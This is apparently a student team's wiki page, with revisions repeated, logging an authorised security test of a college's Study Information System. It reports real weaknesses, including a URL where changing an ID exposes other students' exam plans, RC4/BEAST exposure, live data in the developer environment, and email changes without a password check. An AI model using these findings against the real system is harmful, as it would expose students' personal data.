* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive (link will be here soon).

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T07:04:57Z

Saus: /* Friday - 05.04.13 */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T07:01:16Z

Saus: /* Activity */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
